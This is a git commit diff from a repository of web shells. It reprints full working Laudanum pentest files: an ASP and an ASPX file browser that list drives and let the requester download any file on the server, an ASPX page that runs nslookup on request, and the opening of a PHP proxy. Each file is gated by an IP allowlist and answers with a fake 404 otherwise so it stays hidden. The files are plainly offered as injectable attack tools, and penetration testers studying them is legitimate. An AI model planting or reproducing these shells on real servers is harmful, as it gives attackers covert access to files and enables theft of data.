Set file permissions

g0tmi1k 2018-03-05 10:01:10 +00:00
parent 307f703b8f
commit 7018c294f5
13 changed files with 830 additions and 830 deletions

0
Web-Shells/WordPress/access.php Normal file → Executable file

0
Web-Shells/laudanum-0.8/CREDITS Executable file → Normal file

0
Web-Shells/laudanum-0.8/GPL Executable file → Normal file

0
Web-Shells/laudanum-0.8/README Executable file → Normal file


@ -1,179 +1,179 @@
<%@Language="VBScript"%> <%@Language="VBScript"%>
<%Option Explicit%> <%Option Explicit%>
<%Response.Buffer = True%> <%Response.Buffer = True%>
<% <%
' ******************************************************************************* ' *******************************************************************************
' *** ' ***
' *** Laudanum Project ' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com> ' *** Tim Medin <tim@securitywhole.com>
' *** ' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to the file system. ' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com> ' *** Written by Tim Medin <timmedin@gmail.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License ' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2 ' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version. ' *** of the License, or (at your option) any later version.
' *** ' ***
' *** This program is distributed in the hope that it will be useful, ' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details. ' *** GNU General Public License for more details.
' *** ' ***
' *** You can get a copy of the GNU General Public License from this ' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple ' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA. ' *** Place - Suite Boston, MA USA.
' *** ' ***
' ***************************************************************************** */ ' ***************************************************************************** */
' ***************** Config entries below *********************** ' ***************** Config entries below ***********************
' Define variables ' Define variables
Dim allowedIPs Dim allowedIPs
Dim allowed Dim allowed
Dim filepath Dim filepath
Dim file Dim file
Dim stream Dim stream
Dim path Dim path
Dim i Dim i
Dim fso Dim fso
Dim folder Dim folder
Dim list Dim list
Dim temppath Dim temppath
' IPs are enterable as individual addresses TODO: add CIDR support ' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1" allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above ' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","") allowedIPs = replace(allowedIPS," ","")
'turn it into an array 'turn it into an array
allowedIPs = split(allowedIPS,",") ' allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed ' make sure the ip is allowed
allowed = 0 allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs) for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1 allowed = 1
exit for exit for
end if end if
next next
' send a 404 if the IP Address is not allowed ' send a 404 if the IP Address is not allowed
if allowed = 0 then if allowed = 0 then
Response.Status = "404 File Not Found" Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End Response.End
end if end if
' create file object for use everywhere ' create file object for use everywhere
set fso = CreateObject("Scripting.FileSystemObject") set fso = CreateObject("Scripting.FileSystemObject")
' download a file if selected ' download a file if selected
filepath = trim(Request.QueryString("file")) filepath = trim(Request.QueryString("file"))
'validate file 'validate file
if len(filepath) > 0 then if len(filepath) > 0 then
if fso.FileExists(filepath) then if fso.FileExists(filepath) then
'valid file 'valid file
Set file = fso.GetFile(filepath) Set file = fso.GetFile(filepath)
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
'Response.AddHeader "Content-Length", file.Size 'Response.AddHeader "Content-Length", file.Size
Response.ContentType = "application/octet-stream" Response.ContentType = "application/octet-stream"
set stream = Server.CreateObject("ADODB.Stream") set stream = Server.CreateObject("ADODB.Stream")
stream.Open stream.Open
stream.Type = 1 stream.Type = 1
Response.Charset = "UTF-8" Response.Charset = "UTF-8"
stream.LoadFromFile(file.Path) stream.LoadFromFile(file.Path)
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
Response.BinaryWrite(stream.Read) Response.BinaryWrite(stream.Read)
stream.Close stream.Close
set stream = Nothing set stream = Nothing
set file = Nothing set file = Nothing
Response.End Response.End
end if end if
end if end if
' begin rendering the page ' begin rendering the page
%> %>
<html> <html>
<head> <head>
<title>Laudanum ASP File Browser</title> <title>Laudanum ASP File Browser</title>
</head> </head>
<body> <body>
<h1>Laudanum File Browser 0.1</h1> <h1>Laudanum File Browser 0.1</h1>
<% <%
' get the path to work with, if it isn't set or valid then start with the web root ' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic ' goofy if statement is used since vbscript doesn't use short-curcuit logic
path = trim(Request.QueryString("path")) path = trim(Request.QueryString("path"))
if len(path) = 0 then if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\")) path = fso.GetFolder(Server.MapPath("\"))
elseif not fso.FolderExists(path) then elseif not fso.FolderExists(path) then
path = fso.GetFolder(Server.MapPath("\")) path = fso.GetFolder(Server.MapPath("\"))
end if end if
set folder = fso.GetFolder(path) set folder = fso.GetFolder(path)
' Special locations, webroot and drives ' Special locations, webroot and drives
%><b>Other Locations:</b> <% %><b>Other Locations:</b> <%
for each i in fso.Drives for each i in fso.Drives
if i.IsReady then if i.IsReady then
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<% %><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
end if end if
next next
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><% %><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
' Information on folder ' Information on folder
%><h2>Listing of: <% %><h2>Listing of: <%
list = split(folder.path, "\") list = split(folder.path, "\")
temppath = "" temppath = ""
for each i in list for each i in list
temppath = temppath & i & "\" temppath = temppath & i & "\"
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <% %><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
next next
%></h2><% %></h2><%
' build table for listing ' build table for listing
%><table> %><table>
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><% <tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
' Parent Path if it exists ' Parent Path if it exists
if not folder.IsRootFolder then if not folder.IsRootFolder then
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
end if end if
' Get the folders ' Get the folders
set list = folder.SubFolders set list = folder.SubFolders
for each i in list for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
next next
' Get the files ' Get the files
set list = folder.Files set list = folder.Files
for each i in list for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
next next
' all done ' all done
%> %>
</table> </table>
<hr/> <hr/>
<address> <address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html> </html>


@ -1,144 +1,144 @@
<%@ Page Language="C#"%> <%@ Page Language="C#"%>
<%@ Import Namespace="System" %> <%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body> <html><head><title>Laudanum - DNS</title></head><body>
<script runat="server"> <script runat="server">
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.com *** http://laudanum.secureideas.com
*** laudanum@secureideas.com *** laudanum@secureideas.com
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kevin@secureideas.com> *** Kevin Johnson <kevin@secureideas.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file provides shell access to DNS on the system. *** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com> *** Written by James Jardine <james@secureideas.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
*** ***
***************************************************************************** */ ***************************************************************************** */
// ********************* Config entries below *********************************** // ********************* Config entries below ***********************************
// IPs are enterable as individual addresses // IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" }; string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line ************************** // ***************** No editable content below this line **************************
string stdout = ""; string stdout = "";
string stderr = ""; string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(','); string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() { void die() {
//HttpContext.Current.Response.Clear(); //HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404; HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found"; HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>"); HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError(); HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End(); HttpContext.Current.Response.End();
} }
void Page_Load(object sender, System.EventArgs e) { void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits // check if the X-Fordarded-For header exits
string remoteIp; string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) { if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress; remoteIp = Request.UserHostAddress;
} else { } else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
} }
bool validIp = false; bool validIp = false;
foreach (string ip in allowedIPs) { foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip)); validIp = (validIp || (remoteIp == ip));
} }
if (!validIp) { if (!validIp) {
die(); die();
} }
string qType = "Any"; string qType = "Any";
bool validType = false; bool validType = false;
if (Request.Form["type"] != null) if (Request.Form["type"] != null)
{ {
qType = Request.Form["type"].ToString(); qType = Request.Form["type"].ToString();
foreach (string s in qtypes) foreach (string s in qtypes)
{ {
if (s == qType) if (s == qType)
{ {
validType = true; validType = true;
break; break;
} }
} }
if (!validType) if (!validType)
qType = "Any"; qType = "Any";
} }
if (Request.Form["query"] != null) if (Request.Form["query"] != null)
{ {
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty); string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0) if(query.Length > 0)
{ {
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query); System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error. // The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true; procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true; procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false; procStartInfo.UseShellExecute = false;
// Do not create the black window. // Do not create the black window.
procStartInfo.CreateNoWindow = true; procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it // Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process(); System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo; p.StartInfo = procStartInfo;
p.Start(); p.Start();
// Get the output and error into a string // Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd(); stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd(); stderr = p.StandardError.ReadToEnd();
} }
} }
} }
</script> </script>
<form method="post"> <form method="post">
QUERY: <input type="text" name="query"/><br /> QUERY: <input type="text" name="query"/><br />
Type: <select name="type"> Type: <select name="type">
<% <%
foreach (string s in qtypes) foreach (string s in qtypes)
{ {
Response.Write("<option value=\"" + s + "\">" + s + "</option>"); Response.Write("<option value=\"" + s + "\">" + s + "</option>");
} }
%> %>
</select> </select>
<input type="submit"><br/> <input type="submit"><br/>
STDOUT:<br/> STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre> <pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/> <br/>
<br/> <br/>
<br/> <br/>
STDERR:<br/> STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre> <pre><% = stderr.Replace("<", "&lt;") %></pre>
</body> </body>
</html> </html>


@ -1,154 +1,154 @@
<%@ Page Language="C#"%> <%@ Page Language="C#"%>
<%@ Import Namespace="System" %> <%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body> <html><head><title>Laudanum - File</title></head><body>
<script runat="server"> <script runat="server">
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.com *** http://laudanum.secureideas.com
*** laudanum@secureideas.com *** laudanum@secureideas.com
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kevin@secureideas.com> *** Kevin Johnson <kevin@secureideas.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system *** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com> *** Written by James Jardine <james@secureideas.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */ ********************************************************************************* */
// ********************* Config entries below *********************************** // ********************* Config entries below ***********************************
// IPs are enterable as individual addresses // IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"}; string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line ************************** // ***************** No editable content below this line **************************
bool allowed = false; bool allowed = false;
string dir = ""; string dir = "";
string file = ""; string file = "";
void Page_Load(object sender, System.EventArgs e) void Page_Load(object sender, System.EventArgs e)
{ {
foreach (string ip in allowedIPs) foreach (string ip in allowedIPs)
{ {
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip) if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{ {
allowed = true; allowed = true;
} }
} }
if (!allowed) if (!allowed)
{ {
die(); die();
} }
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory; //dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath("."); dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : ""; file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0) if (file.Length > 0)
{ {
if (System.IO.File.Exists(file)) if (System.IO.File.Exists(file))
{ {
writefile(); writefile();
} }
} }
} }
void writefile() void writefile()
{ {
Response.ClearContent(); Response.ClearContent();
Response.Clear(); Response.Clear();
Response.ContentType = "text/plain"; Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it. //Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";"); //Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file); Response.TransmitFile(file);
Response.Flush(); Response.Flush();
Response.End(); Response.End();
} }
void die() { void die() {
//HttpContext.Current.Response.Clear(); //HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404; HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found"; HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>"); HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError(); HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End(); HttpContext.Current.Response.End();
} }
</script> </script>
<html> <html>
<head></head> <head></head>
<% string[] breadcrumbs = dir.Split('\\'); <% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = ""; string breadcrumb = "";
foreach (string b in breadcrumbs) foreach (string b in breadcrumbs)
{ {
if (b.Length > 0) if (b.Length > 0)
{ {
breadcrumb += b + "\\"; breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>"); Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / "); Response.Write(" / ");
} }
} }
%> %>
<table> <table>
<tr><th>Name</th><th>Date</th><th>Size</th></tr> <tr><th>Name</th><th>Date</th><th>Size</th></tr>
<% <%
try try
{ {
if (System.IO.Directory.Exists(dir)) if (System.IO.Directory.Exists(dir))
{ {
string[] folders = System.IO.Directory.GetDirectories(dir); string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders) foreach (string folder in folders)
{ {
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>"); Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
} }
} }
else else
{ {
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
Response.End(); Response.End();
} }
} }
catch (System.UnauthorizedAccessException ex) catch (System.UnauthorizedAccessException ex)
{ {
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
Response.End(); Response.End();
} }
%> %>
<% <%
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles(); System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files) foreach (System.IO.FileInfo f in files)
{ {
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>"); Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
} }
%> %>
</table> </table>
</body> </body>
</html> </html>

0
Web-Shells/laudanum-0.8/cfm/shell.cfm Executable file → Normal file

0
Web-Shells/laudanum-0.8/jsp/cmd.war Executable file → Normal file


@ -1,3 +1,3 @@
Manifest-Version: 1.0 Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.) Created-By: 1.6.0_10 (Sun Microsystems Inc.)

0
Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml Executable file → Normal file
View File

0
Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp Executable file → Normal file
View File


@ -1,351 +1,351 @@
<?php <?php
ini_set('session.use_cookies', '0'); ini_set('session.use_cookies', '0');
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.secureideas.net
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com> *** Tim Medin <tim@securitywhole.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system. *** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com> *** Written by Tim Medin <tim@securitywhole.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
*** ***
***************************************************************************** */ ***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site // figure out how to reuse sessionid from the remote site
// ***************** Config entries below *********************** // ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support // IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); $allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
# *********** No editable content below this line ************** # *********** No editable content below this line **************
$allowed = 0; $allowed = 0;
foreach ($allowedIPs as $IP) { foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP) if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1; $allowed = 1;
} }
if ($allowed == 0) { if ($allowed == 0) {
header("HTTP/1.0 404 Not Found"); header("HTTP/1.0 404 Not Found");
die(); die();
} }
/* This error handler will turn all notices, warnings, and errors into fatal /* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */ * errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes /* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case. * error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */ * We do note the error in the output, though. */
if (error_reporting() == 0) { if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n"; $_SESSION['output'] .= $errstr . "\n";
} else { } else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> "http://www.w3.org/TR/html4/strict.dtd">
<html> <html>
<head> <head>
<title>Laudanum PHP Proxy</title> <title>Laudanum PHP Proxy</title>
</head> </head>
<body> <body>
<h1>Fatal Error!</h1> <h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p> <p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p> <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr> <hr>
<address> <address>
